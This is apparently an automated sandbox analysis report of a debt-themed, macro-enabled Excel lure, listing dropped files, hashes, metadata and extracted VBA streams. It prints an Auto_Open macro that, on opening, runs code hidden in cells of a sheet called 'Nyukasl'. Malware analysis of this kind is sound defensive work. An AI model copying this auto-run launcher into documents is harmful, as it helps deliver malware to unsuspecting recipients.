.OUTSTA~1.XLS..........Q.y.Q.y*...8.....................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Outstanding-Debt-1636503299-05042021.xlsm.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):163
Entropy (8bit):4.8778093873393065
Encrypted:false
SSDEEP:3:oyBVomxWhl2Bbmdo0XVK6lyEW92Bbmdo0XVK6lmxWhl2Bbmdo0XVK6lv:djSlzO0Z7W9zO0Z/lzO0Z1
MD5:C5D9AFD3D6ADE4CCEFDEC6126BE2BDCB
SHA1:472B0C4E70D715440626E53B76CD0F5105BDDAFE
SHA-256:0B237C086AB8E25E6A9F4B60CD82AC4AC53E1376E0DA4D60DA977551255F0D8D
SHA-512:6231AE6EC5E9A4844DA4B6E8582F52AF16BFE333D4C846680D33693AA9C02CB01FF300356600191802E029792418B652AEEC87493B74344BA495C4AC1E344CEE
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.LNK=0..Outstanding-Debt-1636503299-05042021.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.LNK=0..
C:\Users\user\Desktop\84EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):120466
Entropy (8bit):7.70000301915411
Encrypted:false
SSDEEP:3072:GNT7zR2zarvKINbjvw548LMb/oqKO8NnS8+60KcP:GX2mmAbT648LM7D98Np+EA
MD5:32971DFDE65ACEA2BAF62CD684AF3FA1
SHA1:33CAE7E4D851C2CBE3B47C113E8CF4FD294120CD
SHA-256:5EA534C6542D63AC4DB4B1519DE0BCAC6918D753336A76073A1B4ADAA41CDF39
SHA-512:4E3FDE9CEABF3BA7DDDCEF15932DC4A458270DB2DF2DD449693202E783D678E36F6070797DD2C111176EA6BE1347CF46E928A1AEC576951969473DFE20B9EB7B
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.68857711695949
TrID:
  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
  • ZIP compressed archive (8000/1) 7.58%
File name:Outstanding-Debt-1636503299-05042021.xlsm
File size:116934
MD5:770ec8230138bb271c449bdaf5da519b
SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
SHA512:62ff4c914258230d73e372f4c6153c6eabcea6c43e7049c7bee3503ba8c9e02c09615d3fcdd2779d3e765674eedf41f2b68ac2a04a9f91fe4a2633f06223ab81
SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx
File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/404076/sample/Outstanding-Debt-1636503299-05042021.xlsm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:Rabota
Last Saved By:Noped
Create Time:2015-06-05T18:19:34Z
Last Saved Time:2021-05-04T08:11:27Z
Creating Application:Microsoft Excel
Security:0

Document Summary

Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:16.0300

Streams with VBA

VBA File Name: Blasr.bas, Stream Size: 1166
General
Stream Path:VBA/Blasr
VBA File Name:Blasr.bas
Stream Size:1166
Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
"Blasr"
Application.Run
Attribute
Auto_Open()
VB_Name
Private
VBA Code
Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub
VBA File Name: Briks.cls, Stream Size: 990
General
Stream Path:VBA/Briks
VBA File Name:Briks.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Briks"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Byutut.bas, Stream Size: 1056
General
Stream Path:VBA/Byutut
VBA File Name:Byutut.bas
Stream Size:1056
Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name
"Byutut"
VBA Code
Attribute VB_Name = "Byutut"
VBA File Name: Class1.cls, Stream Size: 1151
General
Stream Path:VBA/Class1
VBA File Name:Class1.cls
Stream Size:1151
Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class2.cls, Stream Size: 999
General
Stream Path:VBA/Class2
VBA File Name:Class2.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class3.cls, Stream Size: 999
General
Stream Path:VBA/Class3
VBA File Name:Class3.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Kikide.cls, Stream Size: 1249
General
Stream Path:VBA/Kikide
VBA File Name:Kikide.cls
Stream Size:1249
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Kikide"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: UserForm1.frm, Stream Size: 1526
General
Stream Path:VBA/UserForm1
VBA File Name:UserForm1.frm
Stream Size:1526
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Vrest.bas, Stream Size: 679
General
Stream Path:VBA/Vrest
VBA File Name:Vrest.bas
Stream Size:679
Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
"Vrest"
VB_Name
VBA Code
Attribute VB_Name = "Vrest"
VBA File Name: Vsewd.cls, Stream Size: 990
General
Stream Path:VBA/Vsewd
VBA File Name:Vsewd.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"Vsewd"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:856
Entropy:5.31019504221
Base64 Encoded:True
Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
Stream Path: PROJECTwm, File Type: data, Stream Size: 209
General
Stream Path:PROJECTwm
File Type:data
Stream Size:209
Entropy:3.32661660177
Base64 Encoded:False
Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path:UserForm1/\x1CompObj
File Type:data
Stream Size:97
Entropy:3.61064918306
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
General
Stream Path:UserForm1/\x3VBFrame
File Type:ASCII text, with CRLF line terminators
Stream Size:266
Entropy:4.62034133633
Base64 Encoded:True
Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
Stream Path: UserForm1/f, File Type: data, Stream Size: 38
General
Stream Path:UserForm1/f
File Type:data
Stream Size:38
Entropy:1.54052096453
Base64 Encoded:False
Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
General
Stream Path:UserForm1/o
File Type:empty
Stream Size:0
Entropy:0.0
Base64 Encoded:False
Data ASCII:
Data Raw:
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:4263
Entropy:4.38205341073
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 1024
General
Stream Path:VBA/dir
File Type:data
Stream Size:1024
Entropy:6.73319737871
Base64 Encoded:True
